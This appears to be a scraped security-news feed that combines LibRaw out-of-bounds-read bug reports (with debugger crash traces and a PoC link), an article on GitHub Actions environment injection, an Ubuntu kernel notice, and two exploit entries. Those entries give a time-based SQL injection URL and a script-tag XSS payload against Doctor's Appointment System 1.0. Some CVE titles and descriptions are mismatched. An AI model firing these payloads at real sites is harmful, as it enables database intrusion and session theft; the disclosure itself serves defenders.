ntdll!RtlUserThreadStart+0x21

**System Configuration:**

*   ImageMagick:  
    Version: ImageMagick-7.0.10-Q16 https://imagemagick.org  
    License: https://imagemagick.org/script/license.php
*   Environment (Operating system, version and so on):  
    Distributor ID: Microsoft Windows  
    Description: Windows 10

CVE-2020-35535: Libraw "LibRaw::parseSonySRF()" Out-of-bounds Read Vulnerability · Issue #283 · LibRaw/LibRaw

In LibRaw, an out-of-bounds read vulnerability exists within the get_huffman_diff() function (libraw\src\x3f\x3f_utils_patched.cpp) when reading data from an image file.

**Description**

An out-of-bounds read vulnerability exists within the "get\_huffman\_diff()" function (libraw\\src\\x3f\\x3f\_utils\_patched.cpp) when parsing a crafted X3F file.

**Steps to Reproduce**

(poc archive password= girlelecta):  
https://drive.google.com/file/d/1Yhqo6idPqWMisvPKrlzjsUKRApHmz2M\_/view

cmd:  
magick.exe convert poc1.X3F new.png

Upon running this, following crash happens (Note: I enabled page heap on magick.exe):

Microsoft (R) Windows Debugger Version 10.0.18362.1 AMD64  
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\magick.exe convert E:\\Workspace\\poc1.X3F E:\\Workspace\\new.png

\*\*\*\*\*\*\*\*\*\*\*\*\* Path validation summary \*\*\*\*\*\*\*\*\*\*\*\*\*\*  
Symbol search path is: srv\*  
Executable search path is:  
ModLoad: 00007ff6 5a870000 00007ff6 5a882000 magick.exe  
ModLoad: 00007ffe c1500000 00007ffe c16f0000 ntdll.dll  
ModLoad: 00007ffe a8a10000 00007ffe a8a81000 C:\\WINDOWS\\System32\\verifier.dll  
Page heap: pid 0x2264: page heap enabled with flags 0x3.  
ModLoad: 00007ffe bf9a0000 00007ffe bfa52000 C:\\WINDOWS\\System32\\KERNEL32.DLL  
ModLoad: 00007ffe be510000 00007ffe be7b3000 C:\\WINDOWS\\System32\\KERNELBASE.dll  
ModLoad: 00007ffe 82020000 00007ffe 822a9000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
ModLoad: 00007ffe c0ea0000 00007ffe c1034000 C:\\WINDOWS\\System32\\USER32.dll  
ModLoad: 00007ffe 92500000 00007ffe 926c9000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
ModLoad: 00007ffe bf580000 00007ffe bf5a1000 C:\\WINDOWS\\System32\\win32u.dll  
ModLoad: 00007ffe c0910000 00007ffe c0936000 C:\\WINDOWS\\System32\\GDI32.dll  
ModLoad: 00007ffe be7c0000 00007ffe be954000 C:\\WINDOWS\\System32\\gdi32full.dll  
ModLoad: 00007ffe a8d20000 00007ffe a8d42000 C:\\WINDOWS\\SYSTEM32\\VCRUNTIME140D.dll  
ModLoad: 00007ffe 8b440000 00007ffe 8b5fb000 C:\\WINDOWS\\SYSTEM32\\ucrtbased.dll  
ModLoad: 00007ffe beab0000 00007ffe beb4e000 C:\\WINDOWS\\System32\\msvcp\_win.dll  
ModLoad: 00007ffe beb80000 00007ffe bec7a000 C:\\WINDOWS\\System32\\ucrtbase.dll  
ModLoad: 00007ffe c1280000 00007ffe c1323000 C:\\WINDOWS\\System32\\ADVAPI32.dll  
ModLoad: 00007ffe c0bb0000 00007ffe c0c4e000 C:\\WINDOWS\\System32\\msvcrt.dll  
ModLoad: 00007ffe c0cc0000 00007ffe c0d57000 C:\\WINDOWS\\System32\\sechost.dll  
ModLoad: 00007ffe c02a0000 00007ffe c03c0000 C:\\WINDOWS\\System32\\RPCRT4.dll  
ModLoad: 00007ffe a88b0000 00007ffe a88d7000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_bzlib\_.dll  
ModLoad: 00007ffe a8220000 00007ffe a833f000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_freetype\_.dll  
ModLoad: 00007ffe a8190000 00007ffe a8216000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_lcms\_.dll  
ModLoad: 00007ffe a7a50000 00007ffe a7af0000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_libxml\_.dll  
ModLoad: 00007ffe a87f0000 00007ffe a881a000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_zlib\_.dll  
ModLoad: 00007ffe a87c0000 00007ffe a87e3000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_lqr\_.dll  
ModLoad: 00007ffe 81ce0000 00007ffe 8201b000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_glib\_.dll  
ModLoad: 00007ffe bfa60000 00007ffe c0145000 C:\\WINDOWS\\System32\\SHELL32.dll  
ModLoad: 00007ffe bf530000 00007ffe bf57a000 C:\\WINDOWS\\System32\\cfgmgr32.dll  
ModLoad: 00007ffe c0b00000 00007ffe c0ba9000 C:\\WINDOWS\\System32\\shcore.dll  
ModLoad: 00007ffe bf5b0000 00007ffe bf8e6000 C:\\WINDOWS\\System32\\combase.dll  
ModLoad: 00007ffe be490000 00007ffe be510000 C:\\WINDOWS\\System32\\bcryptPrimitives.dll  
ModLoad: 00007ffe bec80000 00007ffe bf3ff000 C:\\WINDOWS\\System32\\windows.storage.dll  
ModLoad: 00007ffe c1430000 00007ffe c149f000 C:\\WINDOWS\\System32\\WS2\_32.dll  
ModLoad: 00007ffe be470000 00007ffe be48f000 C:\\WINDOWS\\System32\\profapi.dll  
ModLoad: 00007ffe be400000 00007ffe be44a000 C:\\WINDOWS\\System32\\powrprof.dll  
ModLoad: 00007ffe be3d0000 00007ffe be3e0000 C:\\WINDOWS\\System32\\UMPDC.dll  
ModLoad: 00007ffe c1220000 00007ffe c1272000 C:\\WINDOWS\\System32\\shlwapi.dll  
ModLoad: 00007ffe be3e0000 00007ffe be3f1000 C:\\WINDOWS\\System32\\kernel.appcore.dll  
ModLoad: 00007ffe bf510000 00007ffe bf527000 C:\\WINDOWS\\System32\\cryptsp.dll  
ModLoad: 00007ffe c1040000 00007ffe c1196000 C:\\WINDOWS\\System32\\ole32.dll  
ModLoad: 00007ffe bd950000 00007ffe bd98a000 C:\\WINDOWS\\SYSTEM32\\IPHLPAPI.DLL  
ModLoad: 00007ffe bd990000 00007ffe bda5a000 C:\\WINDOWS\\SYSTEM32\\DNSAPI.dll  
ModLoad: 00007ffe c0220000 00007ffe c0228000 C:\\WINDOWS\\System32\\NSI.dll  
(2264.3f58): Break instruction exception - code 80000003 (first chance)  
ntdll!LdrpDoDebuggerBreak+0x30:  
00007ffe c15d121c cc int 3  
0:000> g  
ModLoad: 00007ffe c1400000 00007ffe c142e000 C:\\WINDOWS\\System32\\IMM32.DLL  
ModLoad: 00007ffe b4720000 00007ffe b472f000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\IM\_MOD\_DB\_DNG\_.dll  
ModLoad: 00007ffe 81b30000 00007ffe 81cdb000 E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_libraw\_.dll  
ModLoad: 00007ffe 9a850000 00007ffe 9a946000 C:\\WINDOWS\\SYSTEM32\\MSVCP140D.dll  
(2264.3f58): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_libraw\_.dll  
CORE\_DB\_libraw\_!get\_bit+0x34:  
00007ffe 81c20bb4 0fb600 movzx eax,byte ptr \[rax\] ds:0000014b bf836da4=??  
0:000> k  
Child-SP RetAddr Call Site  
00 00000038 853e32a0 00007ffe 81c219fe CORE\_DB\_libraw\_!get\_bit+0x34 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 857\]  
01 00000038 853e32c0 00007ffe 81c2251a CORE\_DB\_libraw\_!get\_huffman\_diff+0x6e \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1017\]  
02 00000038 853e3320 00007ffe 81c22352 CORE\_DB\_libraw\_!huffman\_decode\_row+0x13a \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1055\]  
03 00000038 853e33f0 00007ffe 81c37cee CORE\_DB\_libraw\_!huffman\_decode+0xb2 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1095\]  
04 00000038 853e3470 00007ffe 81c37a93 CORE\_DB\_libraw\_!x3f\_load\_huffman\_compressed+0x21e \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1411\]  
05 00000038 853e34e0 00007ffe 81c37ecd CORE\_DB\_libraw\_!x3f\_load\_huffman+0x283 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1468\]  
06 00000038 853e3550 00007ffe 81c37768 CORE\_DB\_libraw\_!x3f\_load\_image+0x12d \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 1514\]  
07 00000038 853e35b0 00007ffe 81c38504 CORE\_DB\_libraw\_!x3f\_load\_data+0x88 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_utils\_patched.cpp @ 2059\]  
08 00000038 853e35f0 00007ffe 81c33628 CORE\_DB\_libraw\_!LibRaw::x3f\_load\_raw+0x64 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\x3f\\x3f\_parse\_process.cpp @ 579\]  
09 00000038 853e36e0 00007ffe 81c3d358 CORE\_DB\_libraw\_!LibRaw::unpack+0xc18 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\decoders\\unpack.cpp @ 283\]  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\IM\_MOD\_DB\_DNG\_.dll  
0a 00000038 853e38a0 00007ffe b4721989 CORE\_DB\_libraw\_!libraw\_unpack+0x48 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\libraw\\src\\libraw\_c\_api.cpp @ 136\]  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickCore\_.dll  
0b 00000038 853e38e0 00007ffe 820783b7 IM\_MOD\_DB\_DNG\_!ReadDNGImage+0x479 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\coders\\dng.c @ 425\]  
0c 00000038 853e59f0 00007ffe 82079af3 CORE\_DB\_MagickCore\_!ReadImage+0x5e7 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickcore\\constitute.c @ 553\]  
\*\*\* WARNING: Unable to verify checksum for E:\\Workspace\\imageMagick\\ImageMagick-windows\\ImageMagick-7.0.9-16\\VisualMagick\\bin\\CORE\_DB\_MagickWand\_.dll  
0d 00000038 853eac10 00007ffe 9253aac3 CORE\_DB\_MagickCore\_!ReadImages+0x393 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickcore\\constitute.c @ 927\]  
0e 00000038 853ebcc0 00007ffe 925d3fe8 CORE\_DB\_MagickWand\_!ConvertImageCommand+0x1523 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickwand\\convert.c @ 606\]  
\*\*\* WARNING: Unable to verify checksum for magick.exe  
0f 00000038 853ed810 00007ff6 5a8714ea CORE\_DB\_MagickWand\_!MagickCommandGenesis+0x338 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\magickwand\\mogrify.c @ 185\]  
10 00000038 853ee980 00007ff6 5a871693 magick!MagickMain+0x4ea \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\utilities\\magick.c @ 149\]  
11 00000038 853efbf0 00007ff6 5a871f24 magick!wmain+0x43 \[e:\\workspace\\imagemagick\\imagemagick-windows\\imagemagick-7.0.9-16\\imagemagick\\utilities\\magick.c @ 195\]  
12 00000038 853efc30 00007ff6 5a871e37 magick!invoke\_main+0x34 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 80\]  
13 00000038 853efc70 00007ff6 5a871cfe magick!\_\_scrt\_common\_main\_seh+0x127 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 253\]  
14 00000038 853efcd0 00007ff6 5a871f39 magick!\_\_scrt\_common\_main+0xe \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_common.inl @ 296\]  
15 00000038 853efd00 00007ffe bf9b7bd4 magick!wmainCRTStartup+0x9 \[f:\\dd\\vctools\\crt\\vcstartup\\src\\startup\\exe\_wmain.cpp @ 17\]  
16 00000038 853efd30 00007ffe c156ced1 KERNEL32!BaseThreadInitThunk+0x14  
17 00000038 853efd60 00000000 00000000 ntdll!RtlUserThreadStart+0x21

**System Configuration**

*   ImageMagick:  
    Version: ImageMagick-7.0.9-Q16 https://imagemagick.org  
    License: https://imagemagick.org/script/license.php
*   Environment (Operating system, version and so on):  
    Distributor ID: Microsoft Windows  
    Description: Windows 10

CVE-2020-35531: LibRaw "get_huffman_diff()" Out-of-bounds read vulnerability · Issue #270 · LibRaw/LibRaw

The insecurities exist in CI/CD pipelines and can be used by attackers to subvert modern development and roll out malicious code at deployment.

A pair of security vulnerabilities discovered in the GitHub environments of two very popular open source projects from Apache and Google could be used to stealthily modify project source code, steal secrets, and move laterally inside an organization.

The issues are continuous integration/continuous delivery (CI/CD) flaws that could threaten many more open source projects around the world, according to researchers at Legit Security, who found them affecting a Google Firebase project and a popular integration framework project run by Apache.

Researchers dubbed the vulnerability pattern "GitHub Environment Injection." It allows attackers to take control of a vulnerable project's GitHub Actions pipeline by creating a specially crafted payload written to a GitHub environment variable called "GITHUB\_ENV." 

Specifically, the issue exists in the way GitHub shares environment variables in the build machine, which can be manipulated to extract information, including the repository ownership credentials.

"The concept is that the build action itself trusts the code that is submitted for review in a way that you don't need anybody to review it," explains Liav Caspi, CTO and co-founder of Legit Security. "The mere fact that somebody makes a contribution tricks the build system into executing something about the code. There is a kind of automated test that runs, and you can make the test execute whatever you put there."

He adds: "The problem there is that anybody that makes a contribution could trigger that without the need for somebody to review it. So, that's very powerful."

**Don't Ignore Security for CI/CD Pipelines**

According to Caspi, his team found the flaws as a part of an ongoing investigation into CI/CD pipelines. With a surge in SolarWinds-style supply chain flaws, they'd particularly been seeking out weaknesses in the GitHub ecosystem, since it's one of the most popular source code management (SCM) systems in the open source world and in enterprise development — and thus a natural vehicle for injecting vulnerabilities into software supply chains.   

He explains that these flaws manifest both a design weakness in the way that the GitHub platform is designed and how different open source projects and enterprises use the platform.

"You could potentially write a very safe build script if you are super aware of the risks and circumvent a lot of risky operations," he explains. "But I think nobody is really aware of that, and there are a couple of mechanisms within GitHub Actions that are very dangerous that are used in everyday build operations."

He says that enterprise development teams should always assume zero trust with GitHub Action and other build systems.

"They should assume that the components they're using to build — whether it is a build plug-in or anything submitted to them — that an attacker could leverage that," he says. "And then they should isolate the environment and also review code in a way that it doesn't execute code submitted for you."

As Caspi explains, these flaws illustrate not only that the open source project itself a potential vector for supply chain vulnerabilities, but so is the code that makes up the CI/CD pipeline and its integration.

Both bugs have been patched.

Code-Injection Bugs Bite Google, Apache Open Source GitHub Projects

Ubuntu Security Notice 5591-1 - It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5591-1August 31, 2022linux-azure, linux-gcp, linux-hwe vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the virtual terminal driver in the Linux kernel did not properly handle VGA console font changes, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   linux-image-4.15.0-1135-gcp     4.15.0-1135.151~16.04.2   linux-image-4.15.0-1150-azure   4.15.0-1150.165~16.04.1   linux-image-4.15.0-192-generic  4.15.0-192.203~16.04.1   linux-image-4.15.0-192-lowlatency  4.15.0-192.203~16.04.1   linux-image-azure               4.15.0.1150.137   linux-image-gcp                 4.15.0.1135.129   linux-image-generic-hwe-16.04   4.15.0.192.179   linux-image-gke                 4.15.0.1135.129   linux-image-lowlatency-hwe-16.04  4.15.0.192.179   linux-image-oem                 4.15.0.192.179   linux-image-virtual-hwe-16.04   4.15.0.192.179Ubuntu 14.04 ESM:   linux-image-4.15.0-1150-azure   4.15.0-1150.165~14.04.1   linux-image-azure               4.15.0.1150.119After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5591-1   CVE-2021-33656

Ubuntu Security Notice USN-5591-1

Doctor's Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.

    # Exploit Title: SQLi - Doctor's Appointment System v1.0# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36201POC:http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

Doctor's Appointment System 1.0 SQL Injection

Doctor's Appointment System version 1.0 suffers from a cross site scripting vulnerability in register.php. Original discovery of cross site scripting in this version is attributed to Soham Bakore in February of 2021.

    # Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36203POC:POST /register.php HTTP/1.1Host: localhostusername=a"><script>alert(1337)</script>&password=123

Tag

#google